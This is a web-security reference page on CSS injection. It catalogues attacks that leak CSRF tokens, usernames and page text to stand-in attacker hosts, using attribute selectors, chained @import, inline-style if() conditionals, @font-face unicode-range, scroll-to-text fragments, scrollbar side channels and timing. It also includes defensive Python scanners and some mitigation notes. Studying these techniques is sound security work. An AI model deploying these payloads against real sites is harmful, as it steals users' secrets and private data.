CSS Injection


LESS Code Injection

LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful @import directive. During compilation, the LESS engine fetches the resources referenced in @import statements and inlines their contents into the resulting CSS when the (inline) option is used.

{{#ref}} less-code-injection.md {{/ref}}

Attribute Selector

CSS selectors are crafted to match the name and value attributes of an input element. If the value attribute of the input element starts with a specific character, a predefined external resource is loaded:

input[name="csrf"][value^="a"] {
background-image: url(https://attacker.com/exfil/a);
}
input[name="csrf"][value^="b"] {
background-image: url(https://attacker.com/exfil/b);
}
/* ... */
input[name="csrf"][value^="9"] {
background-image: url(https://attacker.com/exfil/9);
}

However, this approach hits a limitation when dealing with hidden input elements (type="hidden"), because hidden elements do not load backgrounds.

Bypass for Hidden Elements

To circumvent this limitation, you can target a subsequent sibling element using the ~ general sibling combinator. The CSS rule then applies to all siblings following the hidden input element, causing the background image to load:

input[name="csrf"][value^="csrF"] ~ * {
background-image: url(https://attacker.com/exfil/csrF);
}

A practical example of using this technique is detailed in the provided code snippet. You can check it here.

Prerequisites for CSS Injection

For the CSS Injection technique to be effective, certain conditions must be met:

  1. Payload Length: The CSS injection vector must support sufficiently long payloads to accommodate the crafted selectors.
  2. CSS Re-evaluation: You should have the ability to frame the page, which is necessary to trigger the re-evaluation of the CSS with newly generated payloads.
  3. External Resources: The technique assumes the ability to use externally hosted images. This might be restricted by the site's Content Security Policy (CSP).

Blind Attribute Selector

As explained in this post, it's possible to combine the selectors :has and :not to identify content even from blind elements. This is very useful when you have no idea what is inside the web page loading the CSS injection.
It's also possible to use those selectors to extract information from several blocks of the same type, like in:

<style>
html:has(input[name^="m"]):not(input[name="mytoken"]) {
background: url(/m);
}
</style>
<input name="mytoken" value="1337" />
<input name="myname" value="gareth" />

Combining this with the following @import technique, it's possible to exfiltrate a lot of info using CSS injection from blind pages with blind-css-exfiltration.

@import

The previous technique has some drawbacks; check the prerequisites. You need to either be able to send multiple links to the victim, or you need to be able to iframe the CSS injection vulnerable page.

However, there is another clever technique that uses CSS @import to improve the quality of the technique.

This was first shown by Pepe Vila and it works like this:

Instead of loading the same page over and over again with dozens of different payloads each time (like in the previous one), we are going to load the page just once and only with an import to the attacker's server (this is the payload to send to the victim):

@import url("//attacker.com:5001/start?");

  1. The import is going to receive some CSS script from the attacker and the browser will load it.
  2. The first part of the CSS script the attacker sends is another @import to the attacker's server again.
  3. The attacker's server won't respond to this request yet, as we want to leak some chars first and then respond to this import with the payload to leak the next ones.
  4. The second and bigger part of the payload is going to be an attribute selector leakage payload.
  5. This will send to the attacker's server the first char of the secret and the last one.
  6. Once the attacker's server has received the first and last char of the secret, it will respond to the import requested in step 2.
  7. The response is going to be exactly the same as steps 2, 3 and 4, but this time it will try to find the second char of the secret and then the penultimate one.

The attacker will follow that loop until it manages to completely leak the secret.

You can find the original Pepe Vila's code to exploit this here or you can find almost the same code but commented here.

Tip

The script will try to discover 2 chars each time (from the beginning and from the end) because the attribute selector allows doing things like:

/* value^= to match the beginning of the value */
input[value^="0"] {
--s0: url(http://localhost:5001/leak?pre=0);
}

/* value$= to match the ending of the value */
input[value$="f"] {
--e0: url(http://localhost:5001/leak?post=f);
}

This allows the script to leak the secret faster.

Warning

Sometimes the script doesn't detect correctly that the discovered prefix + suffix is already the complete flag, and it will continue forward (in the prefix) and backwards (in the suffix) and at some point it will hang.
No worries, just check the output because you can see the flag there.
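As an added example (not code from the page or from the PoCs it links), the following Python triage script scans a stylesheet for the two primitives discussed above: attribute selectors that test a value piecewise (value^=, value$=, including the ~ sibling variant used for hidden inputs) paired with a url() fetch, and @import of a cross-origin stylesheet. ALLOWED_HOSTS and the sample stylesheet are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Origins the application legitimately loads images/stylesheets from
# (assumed allowlist for this example).
ALLOWED_HOSTS = {"static.example.org"}

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
IMPORT_RE = re.compile(r"@import[^;]*;", re.I)
URL_RE = re.compile(r"""url\(\s*['"]?([^'")\s]+)['"]?\s*\)""", re.I)
QUOTED_RE = re.compile(r"""['"]([^'"]+)['"]""")
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}")
# [attr^=v], [attr$=v], [attr*=v] ... capture attribute name and operator
ATTR_RE = re.compile(r"\[\s*([\w-]+)\s*([\^$*~|]?=)")


def is_external(url):
    """True when the URL resolves to a host outside ALLOWED_HOSTS.
    Scheme-relative URLs (//host/...) are normalised first; relative paths are not external."""
    if url.startswith("//"):
        url = "https:" + url
    host = urlparse(url).hostname
    return host is not None and host.lower() not in ALLOWED_HOSTS


def probing_attributes(selector):
    """Attribute selectors that test a value piecewise (^= $= *=) or any test on
    the value attribute, which is how the payloads above walk a secret char by char."""
    return [(name, op) for name, op in ATTR_RE.findall(selector)
            if op != "=" or name.lower() == "value"]


def scan_css(css):
    """Return findings: cross-origin @import statements and rules whose selector
    probes an attribute value and whose declarations trigger a fetch via url()."""
    css = COMMENT_RE.sub("", css)
    findings = []
    for stmt in IMPORT_RE.findall(css):
        m = URL_RE.search(stmt) or QUOTED_RE.search(stmt)
        if m and is_external(m.group(1)):
            findings.append({"kind": "external-import", "selector": "@import",
                             "url": m.group(1), "external": True})
    for selector, decls in RULE_RE.findall(IMPORT_RE.sub("", css)):
        selector = " ".join(selector.split())
        probes = probing_attributes(selector)
        urls = URL_RE.findall(decls)
        if not probes or not urls:
            continue
        for url in urls:
            findings.append({
                "kind": "attribute-probe",
                "selector": selector,
                "probes": probes,
                "url": url,
                "external": is_external(url),
                # "~" moves the fetch onto a sibling: the hidden-input bypass
                "sibling_bypass": "~" in selector,
            })
    return findings


# Constructed sample stylesheet mixing the payload shapes above with a benign rule.
SAMPLE_CSS = """
@import url("//attacker.example:5001/start?");
input[name="csrf"][value^="a"] { background-image: url(https://attacker.example/exfil/a); }
input[value$="f"] { --e0: url(http://localhost:5001/leak?post=f); }
input[name="csrf"][value^="csrF"] ~ * { background-image: url(https://attacker.example/exfil/csrF); }
.logo { background-image: url(https://static.example.org/logo.png); }
"""

if __name__ == "__main__":
    for f in scan_css(SAMPLE_CSS):
        print(f["kind"], f["selector"], "->", f["url"], "(external)" if f["external"] else "")
```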

Inline-Style CSS Exfiltration (attr() + if() + image-set())

This primitive enables exfiltration using only an element's inline style attribute, without selectors or external stylesheets. It relies on CSS custom properties, the attr() function to read same-element attributes, the new CSS if() conditionals for branching, and image-set() to trigger a network request that encodes the matched value.

Warning

Equality comparisons in if() require double quotes for string literals. Single quotes will not match.

  • Sink: control an element's style attribute and make sure the target attribute is on the same element (attr() only reads same-element attributes).
  • Read: copy the attribute into a CSS variable: --val: attr(title).
  • Decide: choose a URL using nested conditionals comparing the variable against candidate strings: --steal: if(style(--val:"1"): url(//attacker/1); else: url(//attacker/2)).
  • Exfiltrate: apply background: image-set(var(--steal)) (or any property that performs a fetch) to force a request to the chosen endpoint.

Attempt (does not work; single quotes in comparison):

<div style="--val:attr(title);--steal:if(style(--val:'1'): url(/1); else: url(/2));background:image-set(var(--steal))" title=1>test</div>

Working payload (double quotes required in the comparison):

<div style='--val:attr(title);--steal:if(style(--val:"1"): url(/1); else: url(/2));background:image-set(var(--steal))' title=1>test</div>

Enumerating attribute values with chained conditionals:

<div style='--val: attr(data-uid); --steal: if(style(--val:"1"): url(/1); else: if(style(--val:"2"): url(/2); else: if(style(--val:"3"): url(/3); else: if(style(--val:"4"): url(/4); else: if(style(--val:"5"): url(/5); else: if(style(--val:"6"): url(/6); else: if(style(--val:"7"): url(/7); else: if(style(--val:"8"): url(/8); else: if(style(--val:"9"): url(/9); else: url(/10)))))))))); background: image-set(var(--steal));' data-uid='1'></div>

Realistic demo (probing usernames):

<div style='--val: attr(data-username); --steal: if(style(--val:"martin"): url(https://attacker.tld/martin); else: if(style(--val:"zak"): url(https://attacker.tld/zak); else: url(https://attacker.tld/james))); background: image-set(var(--steal));' data-username="james"></div>

Notes and limitations:

  • Works on Chromium-based browsers at the time of research; behavior may differ on other engines.
  • Best suited to closed/enumerable value spaces (IDs, flags, short usernames). Stealing arbitrary long strings without external stylesheets remains challenging.
  • Any CSS property that takes a URL can be used to trigger the request (e.g., background/image-set, border-image, list-style, cursor, content).

Automation: a Burp Custom Action can generate the nested inline-style payloads to brute-force attribute values: https://github.com/PortSwigger/bambdas/blob/main/CustomAction/InlineStyleAttributeStealer.bambda
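Added example, not part of the page or of the Burp action above: a Python parser that triages inline-style payloads of this shape, reporting which attribute is read, which candidate values the nested if() chain probes, which sink property fires the request and, applying the double-quote rule noted above, which URL a given attribute value would resolve to. The embedded inputs are the page's own payloads.

```python
import html
import re

# One step of the nested chain: if(style(--var:"cand"): url(target); else:
COND_RE = re.compile(
    r"""if\(\s*style\(\s*--[\w-]+\s*:\s*(["'])(.*?)\1\s*\)\s*:\s*"""
    r"""url\(\s*['"]?([^'")\s]+)['"]?\s*\)\s*;\s*else\s*:\s*""", re.S)
URL_RE = re.compile(r"""url\(\s*['"]?([^'")\s]+)['"]?\s*\)""")
STYLE_RE = re.compile(r"""style\s*=\s*(["'])(.*?)\1""", re.S)
READ_RE = re.compile(r"--[\w-]+\s*:\s*attr\(\s*([\w-]+)\s*\)")
# Properties the page lists as fetch triggers, given a url()/image-set()/var() value.
SINK_RE = re.compile(
    r"(?:^|;)\s*(background(?:-image)?|border-image(?:-source)?|list-style(?:-image)?"
    r"|cursor|content)\s*:[^;]*(?:image-set|url|var)\(", re.I)


def parse_chain(expr):
    """Return ([(quote, candidate, url), ...], fallback_url) for a nested if() chain."""
    branches, pos = [], 0
    while (m := COND_RE.match(expr, pos)):
        branches.append((m.group(1), m.group(2), m.group(3)))
        pos = m.end()
    fb = URL_RE.match(expr, pos)
    return branches, (fb.group(1) if fb else None)


def resolve(branches, fallback, value):
    """URL the browser would request for a given attribute value. Per the page,
    only double-quoted comparisons can match; single-quoted ones fall through."""
    for quote, candidate, url in branches:
        if quote == '"' and candidate == value:
            return url
    return fallback


def analyze(fragment):
    """Triage every style attribute in an HTML fragment; one report per element
    that reads an attribute with attr() and branches on it with if()."""
    reports = []
    for _quote, style in STYLE_RE.findall(fragment):
        style = html.unescape(style)
        read = READ_RE.search(style)
        start = style.find("if(")
        if start < 0 or not read:
            continue
        branches, fallback = parse_chain(style[start:])
        reports.append({
            "reads": read.group(1),
            "branches": branches,
            "candidates": [c for _, c, _ in branches],
            "unmatchable": [c for q, c, _ in branches if q == "'"],
            "fallback": fallback,
            "sinks": SINK_RE.findall(style),
        })
    return reports


# The page's payloads, embedded here as test input.
WORKING = ("<div style='--val:attr(title);--steal:if(style(--val:\"1\"): url(/1); "
           "else: url(/2));background:image-set(var(--steal))' title=1>test</div>")
BROKEN = ("<div style=\"--val:attr(title);--steal:if(style(--val:'1'): url(/1); "
          "else: url(/2));background:image-set(var(--steal))\" title=1>test</div>")
USERS = ("<div style='--val: attr(data-username); --steal: if(style(--val:\"martin\"): "
         "url(https://attacker.tld/martin); else: if(style(--val:\"zak\"): "
         "url(https://attacker.tld/zak); else: url(https://attacker.tld/james))); "
         "background: image-set(var(--steal));' data-username=\"james\"></div>")

if __name__ == "__main__":
    for name, payload in (("working", WORKING), ("broken", BROKEN), ("users", USERS)):
        for r in analyze(payload):
            print(name, "reads", r["reads"], "probes", r["candidates"], "via", r["sinks"])
```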

Other selectors

Other ways to access parts of the DOM with CSS selectors:

  • .class-to-search:nth-child(2): This will search for the second item with class "class-to-search" in the DOM.
  • :empty selector: Used for example in this writeup:

[role^="img"][aria-label="1"]:empty {
background-image: url("YOUR_SERVER_URL?1");
}

Reference: CSS based Attack: Abusing unicode-range of @font-face, Error-Based XS-Search PoC by @terjanq

The overall intention is to use a custom font from a controlled endpoint and ensure that text (in this case, 'A') is displayed with this font only if the specified resource (favicon.ico) cannot be loaded.

<!DOCTYPE html>
<html>
<head>
<style>
@font-face {
font-family: poc;
src: url(http://attacker.com/?leak);
unicode-range: U+0041;
}

#poc0 {
font-family: "poc";
}
</style>
</head>
<body>
<object id="poc0" data="http://192.168.0.1/favicon.ico">A</object>
</body>
</html>

  1. Custom Font Usage:
  • A custom font is defined using the @font-face rule inside a <style> tag.
  • The font is named poc and is fetched from an external endpoint (http://attacker.com/?leak).
  • The unicode-range property is set to U+0041, targeting the specific Unicode character 'A'.
  2. Object Element with Fallback Text:
  • An <object> element with id="poc0" is created in the <body> section. This element attempts to load a resource from http://192.168.0.1/favicon.ico.
  • The font-family for this element is set to 'poc', as defined in the <style> section.
  • If the resource (favicon.ico) fails to load, the fallback content (the letter 'A') inside the <object> tag is displayed.
  • The fallback content ('A') will be rendered using the custom font poc if the external resource cannot be loaded.

Styling Scroll-to-Text Fragment

The :target pseudo-class is employed to select an element targeted by a URL fragment, as specified in the CSS Selectors Level 4 specification. It's crucial to understand that ::target-text does not match any elements unless the text is explicitly targeted by the fragment.

A security concern arises when attackers exploit the Scroll-to-text fragment feature, allowing them to confirm the presence of specific text on a webpage by loading a resource from their server through HTML injection. The method involves injecting a CSS rule like this:

:target::before {
content: url(target.png);
}

In such scenarios, if the text "Administrator" is present on the page, the resource target.png is requested from the server, indicating the text's presence. An instance of this attack can be executed through a specially crafted URL that embeds the injected CSS alongside a Scroll-to-text fragment:

http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:%20url(http://attackers-domain/?confirmed_existence_of_Administrator_username)%20}%3C/style%3E#:~:text=Administrator

Here, the attack manipulates HTML injection to deliver the CSS, targeting the specific text "Administrator" through the Scroll-to-text fragment (#:~:text=Administrator). If the text is found, the indicated resource is loaded, inadvertently signaling its presence to the attacker.

For mitigation, the following points should be noted:

  1. Constrained STTF Matching: Scroll-to-text Fragment (STTF) is designed to match only words or sentences, thereby limiting its capability to leak arbitrary secrets or tokens.
  2. Restriction to Top-level Browsing Contexts: STTF operates solely in top-level browsing contexts and does not function within iframes, making any exploitation attempt more noticeable to the user.
  3. Necessity of User Activation: STTF requires a user-activation gesture to operate, meaning exploitations are feasible only through user-initiated navigations. This requirement considerably mitigates the risk of attacks being automated without user interaction. Nevertheless, the blog post author points out specific conditions and bypasses (e.g., social engineering, interaction with prevalent browser extensions) that might ease the automation of the attack.

Awareness of these mechanisms and potential vulnerabilities is key for maintaining web security and safeguarding against such exploitative tactics.

For more information check the original report: https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/

You can check an exploit using this technique for a CTF here.

@font-face / unicode-range

You can specify external fonts for specific unicode values that will only be fetched if those unicode values are present in the page. For example:

<style>
@font-face {
font-family: poc;
src: url(http://attacker.example.com/?A); /* fetched */
unicode-range: U+0041;
}
@font-face {
font-family: poc;
src: url(http://attacker.example.com/?B); /* fetched too */
unicode-range: U+0042;
}
@font-face {
font-family: poc;
src: url(http://attacker.example.com/?C); /* not fetched */
unicode-range: U+0043;
}
#sensitive-information {
font-family: poc;
}
</style>

<p id="sensitive-information">AB</p>

When you access this page, Chrome and Firefox fetch "?A" and "?B" because the text node of sensitive-information contains the "A" and "B" characters. But Chrome and Firefox do not fetch "?C" because the text does not contain "C". This means that we have been able to read "A" and "B".
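Added example, not code from the page: a Python model of the unicode-range download rule, listing the src URLs a browser would fetch for a given text node, plus a count of single-code-point @font-face rules per family, which is the signature a stylesheet reviewer can look for. The sample stylesheet is the page's three-rule example; the behaviour modelled is the one the paragraph above describes for Chrome and Firefox.

```python
import re

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
FONT_FACE_RE = re.compile(r"@font-face\s*\{([^}]*)\}", re.I)
DECL_RE = re.compile(r"([\w-]+)\s*:\s*([^;]+)")
URL_RE = re.compile(r"""url\(\s*['"]?([^'")\s]+)['"]?\s*\)""", re.I)


def parse_unicode_range(spec):
    """Expand a unicode-range value into (lo, hi) code point pairs.
    Handles U+41, U+0041-005A, the U+4? wildcard form and comma-separated lists."""
    ranges = []
    for token in spec.split(","):
        body = token.strip().upper()
        if not body.startswith("U+"):
            continue
        body = body[2:]
        if "?" in body:
            lo, hi = int(body.replace("?", "0"), 16), int(body.replace("?", "F"), 16)
        elif "-" in body:
            a, b = body.split("-", 1)
            lo, hi = int(a, 16), int(b, 16)
        else:
            lo = hi = int(body, 16)
        ranges.append((lo, hi))
    return ranges


def parse_font_faces(css):
    """Extract family, remote src URLs (local() sources carry none) and ranges."""
    faces = []
    for block in FONT_FACE_RE.findall(COMMENT_RE.sub("", css)):
        decls = {k.lower(): v.strip() for k, v in DECL_RE.findall(block)}
        faces.append({
            "family": decls.get("font-family", "").strip("\"'"),
            "urls": URL_RE.findall(decls.get("src", "")),
            "local": "local(" in decls.get("src", ""),
            # no unicode-range means the face covers every code point
            "ranges": parse_unicode_range(decls.get("unicode-range", "U+0-10FFFF")),
        })
    return faces


def fetched_sources(css, text, family):
    """URLs a browser would request when `text` is rendered in `family`: a
    @font-face is only downloaded if its unicode-range covers a code point in use."""
    used = {ord(ch) for ch in text}
    hits = []
    for face in parse_font_faces(css):
        if face["family"] != family:
            continue
        if any(lo <= cp <= hi for cp in used for lo, hi in face["ranges"]):
            hits.extend(face["urls"])
    return hits


def single_char_faces(css):
    """Count per family the @font-face rules covering exactly one code point; a
    family built from many such rules is the per-character probe described above."""
    counts = {}
    for face in parse_font_faces(css):
        if sum(hi - lo + 1 for lo, hi in face["ranges"]) == 1:
            counts[face["family"]] = counts.get(face["family"], 0) + 1
    return counts


# The page's example stylesheet (A, B and C probes), written on one line per rule.
SAMPLE_CSS = """
@font-face { font-family: poc; src: url(http://attacker.example.com/?A); unicode-range: U+0041; }
@font-face { font-family: poc; src: url(http://attacker.example.com/?B); unicode-range: U+0042; }
@font-face { font-family: poc; src: url(http://attacker.example.com/?C); unicode-range: U+0043; }
#sensitive-information { font-family: poc; }
"""

if __name__ == "__main__":
    print(fetched_sources(SAMPLE_CSS, "AB", "poc"))
    print(single_char_faces(SAMPLE_CSS))
```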

Text node exfiltration (I): ligatures

Reference: Wykradanie danych w świetnym stylu – czyli jak wykorzystać CSS-y do ataków na webaplikację

The technique described involves extracting text from a node by exploiting font ligatures and monitoring changes in width. The process involves several steps:

  1. Creation of Custom Fonts:
  • SVG fonts are crafted with glyphs having a horiz-adv-x attribute, which sets a large width for a glyph representing a two-character sequence.
  • Example SVG glyph: , where "XY" denotes the two-character sequence.
  • These fonts are then converted to woff format using fontforge.
  2. Detection of Width Changes:
  • CSS is used to ensure text doesn't wrap (white-space: nowrap) and to customize the scrollbar style.
  • The appearance of a horizontal scrollbar, styled distinctly, acts as an indicator (oracle) that a specific ligature, and hence a specific character sequence, is present in the text.
  • The CSS involved:
    body { white-space: nowrap; }
    body::-webkit-scrollbar { background: blue; }
    body::-webkit-scrollbar:horizontal { background: url(http://attacker.com/?leak); }
  3. Exploit Process:
  • Step 1: Fonts are created for pairs of characters with substantial width.
  • Step 2: A scrollbar-based trick is employed to detect when the large-width glyph (the ligature for a character pair) is rendered, indicating the presence of the character sequence.
  • Step 3: Upon detecting a ligature, new glyphs representing three-character sequences are generated, incorporating the detected pair and adding a preceding or following character.
  • Step 4: Detection of the three-character ligature is carried out.
  • Step 5: The process repeats, progressively revealing the entire text.
  4. Optimization:
  • The current initialization method being used is not efficient.
  • A more efficient approach could involve the CSS @import trick, enhancing the exploit's performance.

Text node exfiltration (II): leaking the charset with a default font (not requiring external assets)

Reference: PoC using Comic Sans by @Cgvwzq & @Terjanq

This trick was released in this Slackers thread. The charset used in a text node can be leaked using the default fonts installed in the browser: no external or custom fonts are needed.

The concept revolves around utilizing an animation to incrementally expand the width of a div, allowing one character at a time to transition from the 'suffix' part of the text to the 'prefix' part. This process effectively splits the text into two sections:

  1. Prefix: The initial line.
  2. Suffix: The subsequent line(s).

The transition stages of the characters would appear as follows:

C
ADB

CA
DB

CAD
B

CADB

During this transition, the unicode-range trick is employed to identify each new character as it joins the prefix. This is achieved by switching the font to Comic Sans, which is notably taller than the default font, consequently triggering a vertical scrollbar. The appearance of this scrollbar indirectly reveals the presence of a new character in the prefix.

Although this method allows detection of unique characters as they appear, it does not specify which character is repeated, only that a repetition has occurred.

Tip

Basically, unicode-range is used to detect a char, but as we don't want to load an external font, we need to find another way.
When the char is found, it's given the pre-installed Comic Sans font, which makes the char bigger and triggers a scroll bar which will leak the found char.

Check the code extracted from the PoC:

/* comic sans is high (lol) and causes a vertical overflow */
@font-face {
font-family: has_A;
src: local("Comic Sans MS");
unicode-range: U+41;
font-style: monospace;
}
@font-face {
font-family: has_B;
src: local("Comic Sans MS");
unicode-range: U+42;
font-style: monospace;
}
@font-face {
font-family: has_C;
src: local("Comic Sans MS");
unicode-range: U+43;
font-style: monospace;
}
@font-face {
font-family: has_D;
src: local("Comic Sans MS");
unicode-range: U+44;
font-style: monospace;
}
@font-face {
font-family: has_E;
src: local("Comic Sans MS");
unicode-range: U+45;
font-style: monospace;
}
@font-face {
font-family: has_F;
src: local("Comic Sans MS");
unicode-range: U+46;
font-style: monospace;
}
@font-face {
font-family: has_G;
src: local("Comic Sans MS");
unicode-range: U+47;
font-style: monospace;
}
@font-face {
font-family: has_H;
src: local("Comic Sans MS");
unicode-range: U+48;
font-style: monospace;
}
@font-face {
font-family: has_I;
src: local("Comic Sans MS");
unicode-range: U+49;
font-style: monospace;
}
@font-face {
font-family: has_J;
src: local("Comic Sans MS");
unicode-range: U+4a;
font-style: monospace;
}
@font-face {
font-family: has_K;
src: local("Comic Sans MS");
unicode-range: U+4b;
font-style: monospace;
}
@font-face {
font-family: has_L;
src: local("Comic Sans MS");
unicode-range: U+4c;
font-style: monospace;
}
@font-face {
font-family: has_M;
src: local("Comic Sans MS");
unicode-range: U+4d;
font-style: monospace;
}
@font-face {
font-family: has_N;
src: local("Comic Sans MS");
unicode-range: U+4e;
font-style: monospace;
}
@font-face {
font-family: has_O;
src: local("Comic Sans MS");
unicode-range: U+4f;
font-style: monospace;
}
@font-face {
font-family: has_P;
src: local("Comic Sans MS");
unicode-range: U+50;
font-style: monospace;
}
@font-face {
font-family: has_Q;
src: local("Comic Sans MS");
unicode-range: U+51;
font-style: monospace;
}
@font-face {
font-family: has_R;
src: local("Comic Sans MS");
unicode-range: U+52;
font-style: monospace;
}
@font-face {
font-family: has_S;
src: local("Comic Sans MS");
unicode-range: U+53;
font-style: monospace;
}
@font-face {
font-family: has_T;
src: local("Comic Sans MS");
unicode-range: U+54;
font-style: monospace;
}
@font-face {
font-family: has_U;
src: local("Comic Sans MS");
unicode-range: U+55;
font-style: monospace;
}
@font-face {
font-family: has_V;
src: local("Comic Sans MS");
unicode-range: U+56;
font-style: monospace;
}
@font-face {
font-family: has_W;
src: local("Comic Sans MS");
unicode-range: U+57;
font-style: monospace;
}
@font-face {
font-family: has_X;
src: local("Comic Sans MS");
unicode-range: U+58;
font-style: monospace;
}
@font-face {
font-family: has_Y;
src: local("Comic Sans MS");
unicode-range: U+59;
font-style: monospace;
}
@font-face {
font-family: has_Z;
src: local("Comic Sans MS");
unicode-range: U+5a;
font-style: monospace;
}
@font-face {
font-family: has_0;
src: local("Comic Sans MS");
unicode-range: U+30;
font-style: monospace;
}
@font-face {
font-family: has_1;
src: local("Comic Sans MS");
unicode-range: U+31;
font-style: monospace;
}
@font-face {
font-family: has_2;
src: local("Comic Sans MS");
unicode-range: U+32;
font-style: monospace;
}
@font-face {
font-family: has_3;
src: local("Comic Sans MS");
unicode-range: U+33;
font-style: monospace;
}
@font-face {
font-family: has_4;
src: local("Comic Sans MS");
unicode-range: U+34;
font-style: monospace;
}
@font-face {
font-family: has_5;
src: local("Comic Sans MS");
unicode-range: U+35;
font-style: monospace;
}
@font-face {
font-family: has_6;
src: local("Comic Sans MS");
unicode-range: U+36;
font-style: monospace;
}
@font-face {
font-family: has_7;
src: local("Comic Sans MS");
unicode-range: U+37;
font-style: monospace;
}
@font-face {
font-family: has_8;
src: local("Comic Sans MS");
unicode-range: U+38;
font-style: monospace;
}
@font-face {
font-family: has_9;
src: local("Comic Sans MS");
unicode-range: U+39;
font-style: monospace;
}
@font-face {
font-family: rest;
src: local("Courier New");
font-style: monospace;
unicode-range: U+0-10FFFF;
}

div.leak {
overflow-y: auto; /* leak channel */
overflow-x: hidden; /* remove false positives */
height: 40px; /* comic sans capitals exceed this height */
font-size: 0px; /* make suffix invisible */
letter-spacing: 0px; /* separation */
word-break: break-all; /* small width split words in lines */
font-family: rest; /* default */
background: grey; /* default */
width: 0px; /* initial value */
animation: loop step-end 200s 0s, trychar step-end 2s 0s; /* animations: trychar duration must be 1/100th of loop duration */
animation-iteration-count: 1, infinite; /* single width iteration, repeat trychar one per width increase (or infinite) */
}

div.leak::first-line {
font-size: 30px; /* prefix is visible in first line */
text-transform: uppercase; /* only capital letters leak */
}

/* iterate over all chars */
@keyframes trychar {
0% {
font-family: rest;
} /* delay for width change */
5% {
font-family: has_A, rest;
--leak: url(?a);
}
6% {
font-family: rest;
}
10% {
font-family: has_B, rest;
--leak: url(?b);
}
11% {
font-family: rest;
}
15% {
font-family: has_C, rest;
--leak: url(?c);
}
16% {
font-family: rest;
}
20% {
font-family: has_D, rest;
--leak: url(?d);
}
21% {
font-family: rest;
}
25% {
font-family: has_E, rest;
--leak: url(?e);
}
26% {
font-family: rest;
}
30% {
font-family: has_F, rest;
--leak: url(?f);
}
31% {
font-family: rest;
}
35% {
font-family: has_G, rest;
--leak: url(?g);
}
36% {
font-family: rest;
}
40% {
font-family: has_H, rest;
--leak: url(?h);
}
41% {
font-family: rest;
}
45% {
font-family: has_I, rest;
--leak: url(?i);
}
46% {
font-family: rest;
}
50% {
font-family: has_J, rest;
--leak: url(?j);
}
51% {
font-family: rest;
}
55% {
font-family: has_K, rest;
--leak: url(?k);
}
56% {
font-family: rest;
}
60% {
font-family: has_L, rest;
--leak: url(?l);
}
61% {
font-family: rest;
}
65% {
font-family: has_M, rest;
--leak: url(?m);
}
66% {
font-family: rest;
}
70% {
font-family: has_N, rest;
--leak: url(?n);
}
71% {
font-family: rest;
}
75% {
font-family: has_O, rest;
--leak: url(?o);
}
76% {
font-family: rest;
}
80% {
font-family: has_P, rest;
--leak: url(?p);
}
81% {
font-family: rest;
}
85% {
font-family: has_Q, rest;
--leak: url(?q);
}
86% {
font-family: rest;
}
90% {
font-family: has_R, rest;
--leak: url(?r);
}
91% {
font-family: rest;
}
95% {
font-family: has_S, rest;
--leak: url(?s);
}
96% {
font-family: rest;
}
}

/* increase width char by char, i.e. add new char to prefix */
@keyframes loop {
0% {
width: 0px;
}
1% {
width: 20px;
}
2% {
width: 40px;
}
3% {
width: 60px;
}
4% {
width: 80px;
}
4% {
width: 100px;
}
5% {
width: 120px;
}
6% {
width: 140px;
}
7% {
width: 0px;
}
}

div::-webkit-scrollbar {
background: blue;
}

/* side-channel */
div::-webkit-scrollbar:vertical {
background: blue var(--leak);
}

Text node exfiltration (III): leaking the charset with a default font by hiding elements (not requiring external assets)

Reference: This is mentioned as an unsuccessful solution in this writeup

This case is very similar to the previous one, but here the goal of making specific chars bigger than the others is to hide something, like a button so it isn't pressed by the bot, or an image that won't be loaded. So we could measure the action (or the lack of action) and know if a specific char is present inside the text.

Text node exfiltration (III): leaking the charset by cache timing (not requiring external assets)

Reference: This is mentioned as an unsuccessful solution in this writeup

In this case, we could try to leak whether a char is in the text by loading a fake font from the same origin:

@font-face {
font-family: "A1";
src: url(/static/bootstrap.min.css?q=1);
unicode-range: U+0041;
}

If there is a match, the font will be loaded from /static/bootstrap.min.css?q=1. Although it won't load successfully, the browser should cache it, and even if there is no cache, there is the 304 not modified mechanism, so the response should be faster than other things.

However, if the time difference between the cached response and the non-cached one isn't big enough, this won't be useful. For example, the author mentioned: However, after testing, I found that the first problem is that the speed is not much different, and the second problem is that the bot uses the disk-cache-size=1 flag, which is really thoughtful.

Text node exfiltration (III): leaking the charset by timing loading hundreds of local "fonts" (not requiring external assets)

Reference: This is mentioned as an unsuccessful solution in this writeup

In this case you can make the CSS load hundreds of fake fonts from the same origin when a match occurs. This way you can measure the time it takes and find out whether a char appears or not with something like:

@font-face {
font-family: "A1";
src: url(/static/bootstrap.min.css?q=1), url(/static/bootstrap.min.css?q=2),
.... url(/static/bootstrap.min.css?q=500);
unicode-range: U+0041;
}

And the code of the bot looks like this:

browser.get(url)
WebDriverWait(browser, 30).until(lambda r: r.execute_script('return document.readyState') == 'complete')
time.sleep(30)

So, if the font doesn't match, the response time when visiting the bot is expected to be approximately 30 seconds. However, if there is a font match, multiple requests will be sent to retrieve the font, causing continuous network activity. As a result, it will take more time to satisfy the stop condition and receive the response. Therefore, the response time can be used as an indicator to determine whether there is a font match.
